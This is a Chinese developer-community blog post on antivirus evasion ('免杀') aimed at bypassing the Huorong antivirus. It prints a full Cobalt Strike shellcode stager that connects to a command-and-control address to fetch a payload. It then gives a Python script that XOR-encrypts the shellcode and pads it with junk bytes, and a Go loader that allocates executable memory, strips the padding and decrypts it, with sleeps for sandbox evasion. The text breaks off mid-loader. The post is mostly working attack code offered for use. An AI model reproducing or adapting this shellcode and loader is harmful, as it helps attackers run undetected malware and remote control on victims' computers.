备案控制台
开发者社区 开发与运维 文章 正文

Go/Python 免杀

2023-05-29 77
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Go/Python 免杀

CS免杀--绕火绒

首先 cs 生成c语言的shellcode


* length: 923 bytes */
unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xe9\x93\x00\x00\x00\x5a\x48\x89\xc1\x41\xb8\xb8\x22\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x79\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x32\xc0\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\xba\x1f\x00\x00\x00\x6a\x00\x68\x80\x33\x00\x00\x49\x89\xe0\x41\xb9\x04\x00\x00\x00\x41\xba\x75\x46\x9e\x86\xff\xd5\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xb3\xe9\xe4\x01\x00\x00\xe8\x82\xff\xff\xff\x2f\x59\x4b\x6c\x4d\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x29\x0d\x0a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x7f\xfd\xff\xff\x31\x30\x2e\x30\x2e\x30\x2e\x31\x30\x00\x00\x00\x00\x00";

python 加密shellcode

def xor(shellcode, key):
    new_shellcode = ""
    key_len = len(key)
    # 对shellcode的每一位进行xor亦或处理
    for i in range(0, len(shellcode)):
        s = ord(shellcode[i])
        p = ord((key[i % key_len]))
        s = s ^ p  # 与p异或,p就是key中的字符之一
        s = chr(s)
        new_shellcode += s
    return new_shellcode
def random_decode(shellcode):
    j = 0
    new_shellcode = ""
    for i in range(0,len(shellcode)):
        if i % 2 == 0:
            new_shellcode[i] = shellcode[j]
            j += 1
    return new_shellcode
def add_random_code(shellcode, key):
    new_shellcode = ""
    key_len = len(key)
    # 每个字节后面添加随机一个字节,随机字符来源于key
    for i in range(0, len(shellcode)):
        #print(ord(shellcode[i]))
        new_shellcode += shellcode[i]
        # print("&"+hex(ord(new_shellcode[i])))
        new_shellcode += key[i % key_len]
        #print(i % key_len)
    return new_shellcode
# 将shellcode打印输出
def str_to_hex(shellcode):
    raw = ""
    for i in range(0, len(shellcode)):
        s = hex(ord(shellcode[i])).replace("0x",',0x')
        raw = raw + s
    return raw
if __name__ == '__main__':
    shellcode = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x20\x03\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x72\x6c\x34\x4b\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x4e\x50\x30\x39\x3b\x20\x4e\x50\x30\x39\x3b\x20\x4d\x41\x41\x55\x29\x0d\x0a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x2b\x48\x2a\x00\x35\x4f\x21\x50\x25\x40\x41\x50\x5b\x34\x5c\x50\x5a\x58\x35\x34\x28\x50\x5e\x29\x37\x43\x43\x29\x37\x7d\x24\x45\x49\x43\x41\x52\x2d\x53\x54\x41\x4e\x44\x41\x52\x44\x2d\x41\x4e\x54\x49\x56\x49\x52\x55\x53\x2d\x54\x45\x53\x54\x2d\x46\x49\x4c\x45\x21\x24\x48\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x30\x2e\x30\x2e\x30\x2e\x31\x30\x00\x00\x00\x00\x00"
    # 这是异或和增加随机字符使用的key
    key = "iqe"
    print(shellcode[0])
    print(len(shellcode))
    # 首先对shellcode进行异或处理
    shellcode = xor(shellcode, key)
    print(len(shellcode))
    # 然后在shellcode中增加随机字符
    shellcode = add_random_code(shellcode, key)
    # 将shellcode打印出来
    print(str_to_hex(shellcode))

加密shellcode后,再使用go语言加载混淆后的shellcode,先解密再执行。

package main
import (
"fmt"
"syscall"
"time"
"unsafe"
)
const (
  MEM_COMMIT             = 0x1000
  MEM_RESERVE            = 0x2000
  PAGE_EXECUTE_READWRITE = 0x40 // 区域可以执行代码,应用程序可以读写该区域。
)
var (
  kernel32      = syscall.MustLoadDLL("kernel32.dll")
  ntdll         = syscall.MustLoadDLL("ntdll.dll")
  VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
  RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
func main() {
  mix_shellcode := []byte{0x95,0x69,0x39,0x71,0xe6,0x65,0x8d,0x69,0x81,0x71,0x8d,0x65,0xa1,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x30,0x71,0x34,0x65,0x28,0x69,0x21,0x71,0x37,0x65,0x38,0x69,0x27,0x71,0x2d,0x65,0x58,0x69,0xa3,0x71,0x0,0x65,0x21,0x69,0xfa,0x71,0x37,0x65,0x9,0x69,0x39,0x71,0xee,0x65,0x3b,0x69,0x69,0x71,0x2d,0x65,0xe2,0x69,0x23,0x71,0x45,0x65,0x21,0x69,0xfa,0x71,0x17,0x65,0x39,0x69,0x39,0x71,0x6a,0x65,0xde,0x69,0x3b,0x71,0x2f,0x65,0x24,0x69,0x40,0x71,0xac,0x65,0x21,0x69,0x40,0x71,0xa5,0x65,0xc5,0x69,0x4d,0x71,0x4,0x65,0x15,0x69,0x73,0x71,0x49,0x65,0x49,0x69,0x30,0x71,0xa4,0x65,0xa0,0x69,0x7c,0x71,0x24,0x65,0x68,0x69,0xb0,0x71,0x87,0x65,0x84,0x69,0x23,0x71,0x24,0x65,0x38,0x69,0x39,0x71,0xee,0x65,0x3b,0x69,0x51,0x71,0xee,0x65,0x2b,0x69,0x4d,0x71,0x2d,0x65,0x68,0x69,0xa1,0x71,0x3,0x65,0xe8,0x69,0x9,0x71,0x7d,0x65,0x62,0x69,0x73,0x71,0x10,0x65,0x1b,0x69,0xfa,0x71,0xe5,0x65,0xe1,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x39,0x71,0xe0,0x65,0xa9,0x69,0x5,0x71,0x2,0x65,0x21,0x69,0x70,0x71,0xb5,0x65,0x39,0x69,0xfa,0x71,0x2d,0x65,0x71,0x69,0x35,0x71,0xee,0x65,0x29,0x69,0x51,0x71,0x2c,0x65,0x68,0x69,0xa1,0x71,0x86,0x65,0x3f,0x69,0x39,0x71,0x9a,0x65,0xa0,0x69,0x30,0x71,0xee,0x65,0x5d,0x69,0xf9,0x71,0x2d,0x65,0x68,0x69,0xa7,0x71,0x28,0x65,0x58,0x69,0xb8,0x71,0x2d,0x65,0x58,0x69,0xb1,0x71,0xc9,0x65,0x28,0x69,0xb0,0x71,0xac,0x65,0x64,0x69,0x30,0x71,0x64,0x65,0xa8,0x69,0x49,0x71,0x85,0x65,0x1c,0x69,0x80,0x71,0x29,0x65,0x6a,0x69,0x3d,0x71,0x41,0x65,0x61,0x69,0x34,0x71,0x5c,0x65,0xb8,0x69,0x4,0x71,0xbd,0x65,0x31,0x69,0x35,0x71,0xee,0x65,0x29,0x69,0x55,0x71,0x2c,0x65,0x68,0x69,0xa1,0x71,0x3,0x65,0x28,0x69,0xfa,0x71,0x69,0x65,0x21,0x69,0x35,0x71,0xee,0x65,0x29,0x69,0x6d,0x71,0x2c,0x65,0x68,0x69,0xa1,0x71,0x24,0x65,0xe2,0x69,0x75,0x71,0xed,0x65,0x21,0x69,0x70,0x71,0xb5,0x65,0x28,0x69,0x29,0x71,0x24,0x65,0x31,0x69,0x2f,0x71,0x3c,0x65,0x33,0x69,0x30,0x71,0x3d,0x65,0x28,0x69,0x28,0x71,0x24,0x65,0x33,0x69,0x39,0x71,0xe6,0x65,0x85,0x69,0x51,0x71,0x24,0x65,0x3b,0x69,0x8e,0x71,0x85,0x65,0x31,0x69,0x30,0x71,0x3c,0x65,0x33,0x69,0x39,0x71,0xee,0x65,0x7b,0x69,0x98,0x71,0x2a,0x65,0x96,0x69,0x8e,0x71,0x9a,0x65,0x34,0x69,0x1b,0x71,0x65,0x65,0x20,0x69,0xcf,0x71,0x12,0x65,0x0,0x69,0x1f,0x71,0xc,0x65,0x7,0x69,0x14,0x71,0x11,0x65,0x69,0x69,0x30,0x71,0x33,0x65,0x20,0x69,0xf8,0x71,0x83,0x65,0x25,0x69,0xf8,0x71,0x94,0x65,0x28,0x69,0xcb,0x71,0x29,0x65,0x1e,0x69,0x57,0x71,0x62,0x65,0x96,0x69,0xa4,0x71,0x2d,0x65,0x58,0x69,0xb8,0x71,0x2d,0x65,0x58,0x69,0xa3,0x71,0x28,0x65,0x58,0x69,0xb1,0x71,0x28,0x65,0x58,0x69,0xb8,0x71,0x24,0x65,0x39,0x69,0x30,0x71,0x35,0x65,0x28,0x69,0xcb,0x71,0x5f,0x65,0x3f,0x69,0x8,0x71,0xc2,0x65,0x96,0x69,0xa4,0x71,0x8e,0x65,0x1a,0x69,0x2b,0x71,0x2d,0x65,0xe0,0x69,0xb0,0x71,0x24,0x65,0xd1,0x69,0x51,0x71,0x66,0x65,0x69,0x69,0x71,0x71,0x28,0x65,0x58,0x69,0xb8,0x71,0x24,0x65,0x38,0x69,0x30,0x71,0x34,0x65,0x3,0x69,0x72,0x71,0x24,0x65,0x38,0x69,0x30,0x71,0xdf,0x65,0x3e,0x69,0xf8,0x71,0xfa,0x65,0xaf,0x69,0x8e,0x71,0xb0,0x65,0x82,0x69,0x28,0x71,0x3e,0x65,0x21,0x69,0xf8,0x71,0xa4,0x65,0x21,0x69,0x40,0x71,0xb7,0x65,0x20,0x69,0xf8,0x71,0xbd,0x65,0x24,0x69,0x40,0x71,0xac,0x65,0x3b,0x69,0x19,0x71,0x65,0x65,0x6b,0x69,0x31,0x71,0xe1,0x65,0x3b,0x69,0x23,0x71,0x24,0x65,0xd3,0x69,0x9a,0x71,0x30,0x65,0x47,0x69,0x4a,0x71,0x9a,0x65,0xbc,0x69,0x39,0x71,0xec,0x65,0xaf,0x69,0x39,0x71,0xe6,0x65,0xaa,0x69,0x21,0x71,0xf,0x65,0x63,0x69,0x2e,0x71,0x2d,0x65,0xe0,0x69,0x80,0x71,0x2d,0x65,0xe0,0x69,0xab,0x71,0x2c,0x65,0xae,0x69,0xb1,0x71,0x9a,0x65,0x96,0x69,0x8e,0x71,0x9a,0x65,0x24,0x69,0x40,0x71,0xac,0x65,0x3b,0x69,0x23,0x71,0x24,0x65,0xd3,0x69,0x5c,0x71,0x63,0x65,0x71,0x69,0xa,0x71,0x9a,0x65,0xbc,0x69,0xf4,0x71,0xa5,0x65,0x66,0x69,0xf4,0x71,0xf8,0x65,0x68,0x69,0x71,0x71,0x65,0x65,0x21,0x69,0x8e,0x71,0xaa,0x65,0x66,0x69,0xf5,0x71,0xe9,0x65,0x68,0x69,0x71,0x71,0x65,0x65,0x82,0x69,0xa2,0x71,0x8c,0x65,0x8d,0x69,0x70,0x71,0x65,0x65,0x69,0x69,0x99,0x71,0xc7,0x65,0x96,0x69,0x8e,0x71,0x9a,0x65,0x46,0x69,0x3,0x71,0x9,0x65,0x5d,0x69,0x3a,0x71,0x65,0x65,0x5c,0x69,0x3e,0x71,0x44,0x65,0x39,0x69,0x54,0x71,0x25,0x65,0x28,0x69,0x21,0x71,0x3e,0x65,0x5d,0x69,0x2d,0x71,0x35,0x65,0x33,0x69,0x29,0x71,0x50,0x65,0x5d,0x69,0x59,0x71,0x35,0x65,0x37,0x69,0x58,0x71,0x52,0x65,0x2a,0x69,0x32,0x71,0x4c,0x65,0x5e,0x69,0xc,0x71,0x41,0x65,0x2c,0x69,0x38,0x71,0x26,0x65,0x28,0x69,0x23,0x71,0x48,0x65,0x3a,0x69,0x25,0x71,0x24,0x65,0x27,0x69,0x35,0x71,0x24,0x65,0x3b,0x69,0x35,0x71,0x48,0x65,0x28,0x69,0x3f,0x71,0x31,0x65,0x20,0x69,0x27,0x71,0x2c,0x65,0x3b,0x69,0x24,0x71,0x36,0x65,0x44,0x69,0x25,0x71,0x20,0x65,0x3a,0x69,0x25,0x71,0x48,0x65,0x2f,0x69,0x38,0x71,0x29,0x65,0x2c,0x69,0x50,0x71,0x41,0x65,0x21,0x69,0x5a,0x71,0x2d,0x65,0x43,0x69,0x71,0x71,0x50,0x65,0x26,0x69,0x50,0x71,0x35,0x65,0x4c,0x69,0x71,0x71,0x30,0x65,0x1a,0x69,0x14,0x71,0x17,0x65,0x44,0x69,0x30,0x71,0x2,0x65,0xc,0x69,0x1f,0x71,0x11,0x65,0x53,0x69,0x51,0x71,0x28,0x65,0x6,0x69,0xb,0x71,0xc,0x65,0x5,0x69,0x1d,0x71,0x4,0x65,0x46,0x69,0x44,0x71,0x4b,0x65,0x59,0x69,0x51,0x71,0x4d,0x65,0xa,0x69,0x1e,0x71,0x8,0x65,0x19,0x69,0x10,0x71,0x11,0x65,0x0,0x69,0x13,0x71,0x9,0x65,0xc,0x69,0x4a,0x71,0x45,0x65,0x24,0x69,0x22,0x71,0x2c,0x65,0x2c,0x69,0x51,0x71,0x5c,0x65,0x47,0x69,0x41,0x71,0x5e,0x65,0x49,0x69,0x26,0x71,0xc,0x65,0x7,0x69,0x15,0x71,0xa,0x65,0x1e,0x69,0x2,0x71,0x45,0x65,0x27,0x69,0x25,0x71,0x45,0x65,0x5f,0x69,0x5f,0x71,0x54,0x65,0x52,0x69,0x51,0x71,0x32,0x65,0x26,0x69,0x26,0x71,0x53,0x65,0x5d,0x69,0x4a,0x71,0x45,0x65,0x3d,0x69,0x3,0x71,0xc,0x65,0xd,0x69,0x14,0x71,0xb,0x65,0x1d,0x69,0x5e,0x71,0x50,0x65,0x47,0x69,0x41,0x71,0x5e,0x65,0x49,0x69,0x3f,0x71,0x35,0x65,0x59,0x69,0x48,0x71,0x5e,0x65,0x49,0x69,0x3f,0x71,0x35,0x65,0x59,0x69,0x48,0x71,0x5e,0x65,0x49,0x69,0x3c,0x71,0x24,0x65,0x28,0x69,0x24,0x71,0x4c,0x65,0x64,0x69,0x7b,0x71,0x65,0x65,0x5c,0x69,0x3e,0x71,0x44,0x65,0x39,0x69,0x54,0x71,0x25,0x65,0x28,0x69,0x21,0x71,0x3e,0x65,0x5d,0x69,0x2d,0x71,0x35,0x65,0x33,0x69,0x29,0x71,0x50,0x65,0x5d,0x69,0x59,0x71,0x35,0x65,0x37,0x69,0x58,0x71,0x52,0x65,0x2a,0x69,0x32,0x71,0x4c,0x65,0x5e,0x69,0xc,0x71,0x41,0x65,0x2c,0x69,0x38,0x71,0x26,0x65,0x28,0x69,0x23,0x71,0x48,0x65,0x3a,0x69,0x25,0x71,0x24,0x65,0x27,0x69,0x35,0x71,0x24,0x65,0x3b,0x69,0x35,0x71,0x48,0x65,0x28,0x69,0x3f,0x71,0x31,0x65,0x20,0x69,0x27,0x71,0x2c,0x65,0x3b,0x69,0x24,0x71,0x36,0x65,0x44,0x69,0x25,0x71,0x20,0x65,0x3a,0x69,0x25,0x71,0x48,0x65,0x2f,0x69,0x38,0x71,0x29,0x65,0x2c,0x69,0x50,0x71,0x41,0x65,0x21,0x69,0x5a,0x71,0x2d,0x65,0x43,0x69,0x71,0x71,0x50,0x65,0x26,0x69,0x50,0x71,0x35,0x65,0x4c,0x69,0x31,0x71,0x24,0x65,0x39,0x69,0x2a,0x71,0x51,0x65,0x35,0x69,0x21,0x71,0x3f,0x65,0x31,0x69,0x44,0x71,0x51,0x65,0x41,0x69,0x21,0x71,0x3b,0x65,0x40,0x69,0x46,0x71,0x26,0x65,0x2a,0x69,0x58,0x71,0x52,0x65,0x14,0x69,0x55,0x71,0x20,0x65,0x20,0x69,0x32,0x71,0x24,0x65,0x3b,0x69,0x5c,0x71,0x36,0x65,0x3d,0x69,0x30,0x71,0x2b,0x65,0x2d,0x69,0x30,0x71,0x37,0x65,0x2d,0x69,0x5c,0x71,0x24,0x65,0x27,0x69,0x25,0x71,0x2c,0x65,0x3f,0x69,0x38,0x71,0x37,0x65,0x3c,0x69,0x22,0x71,0x48,0x65,0x3d,0x69,0x34,0x71,0x36,0x65,0x3d,0x69,0x5c,0x71,0x23,0x65,0x20,0x69,0x3d,0x71,0x20,0x65,0x48,0x69,0x55,0x71,0x2d,0x65,0x42,0x69,0x39,0x71,0x4f,0x65,0x69,0x69,0x44,0x71,0x2a,0x65,0x48,0x69,0x21,0x71,0x40,0x65,0x29,0x69,0x30,0x71,0x35,0x65,0x32,0x69,0x45,0x71,0x39,0x65,0x39,0x69,0x2b,0x71,0x3d,0x65,0x5c,0x69,0x45,0x71,0x4d,0x65,0x39,0x69,0x2f,0x71,0x4c,0x65,0x5e,0x69,0x32,0x71,0x26,0x65,0x40,0x69,0x46,0x71,0x18,0x65,0x4d,0x69,0x34,0x71,0x2c,0x65,0x2a,0x69,0x30,0x71,0x37,0x65,0x44,0x69,0x22,0x71,0x31,0x65,0x28,0x69,0x3f,0x71,0x21,0x65,0x28,0x69,0x23,0x71,0x21,0x65,0x44,0x69,0x30,0x71,0x2b,0x65,0x3d,0x69,0x38,0x71,0x33,0x65,0x20,0x69,0x23,0x71,0x30,0x65,0x3a,0x69,0x5c,0x71,0x31,0x65,0x2c,0x69,0x22,0x71,0x31,0x65,0x44,0x69,0x37,0x71,0x2c,0x65,0x25,0x69,0x34,0x71,0x44,0x65,0x4d,0x69,0x39,0x71,0x65,0x65,0x28,0x69,0xcf,0x71,0x95,0x65,0xdc,0x69,0xd3,0x71,0x33,0x65,0x96,0x69,0xa4,0x71,0x2d,0x65,0x58,0x69,0xb8,0x71,0xdf,0x65,0x69,0x69,0x71,0x71,0x25,0x65,0x69,0x69,0x30,0x71,0xdd,0x65,0x69,0x69,0x61,0x71,0x65,0x65,0x69,0x69,0x30,0x71,0xdc,0x65,0x29,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x30,0x71,0xdf,0x65,0x31,0x69,0xd5,0x71,0x36,0x65,0x8c,0x69,0x8e,0x71,0xb0,0x65,0x21,0x69,0xe2,0x71,0x36,0x65,0x3a,0x69,0x39,0x71,0xec,0x65,0x8e,0x69,0x39,0x71,0xec,0x65,0x98,0x69,0x39,0x71,0xec,0x65,0xb3,0x69,0x30,0x71,0xdd,0x65,0x69,0x69,0x51,0x71,0x65,0x65,0x69,0x69,0x38,0x71,0xec,0x65,0x90,0x69,0x30,0x71,0xdf,0x65,0x7b,0x69,0xe7,0x71,0xec,0x65,0x8b,0x69,0x8e,0x71,0xb0,0x65,0x21,0x69,0xf2,0x71,0xa1,0x65,0x49,0x69,0xf4,0x71,0xa5,0x65,0x1d,0x69,0xc7,0x71,0x3,0x65,0xe2,0x69,0x76,0x71,0x2d,0x65,0x68,0x69,0xb2,0x71,0xe0,0x65,0xa9,0x69,0x4,0x71,0xb2,0x65,0x31,0x69,0x29,0x71,0x3d,0x65,0x21,0x69,0x74,0x71,0x65,0x65,0x69,0x69,0x71,0x71,0x65,0x65,0x39,0x69,0xb2,0x71,0x8d,0x65,0xf6,0x69,0x8c,0x71,0x9a,0x65,0x96,0x69,0x40,0x71,0x55,0x65,0x47,0x69,0x41,0x71,0x4b,0x65,0x59,0x69,0x5f,0x71,0x54,0x65,0x59,0x69,0x71,0x71,0x65,0x65,0x69,0x69,0x71,0x71,0x65,0x65}
  var ttyolller []byte
  key := []byte("iqe")
  var key_size = len(key)
  var shellcode_final []byte
  var j = 0
  time.Sleep(2)
  // 去除垃圾代码
  fmt.Print(len(mix_shellcode))
  for i := 0; i < len(mix_shellcode); i++ {
    if (i % 2 == 0) {
      shellcode_final = append(shellcode_final,mix_shellcode[i])
      j += 1
    }
  }
  time.Sleep(3)
  fmt.Print(shellcode_final)
  // 解密异或
  for i := 0; i < len(shellcode_final); i++ {
    ttyolller = append(ttyolller, shellcode_final[i]^key[i % key_size])
  }
  time.Sleep(3)
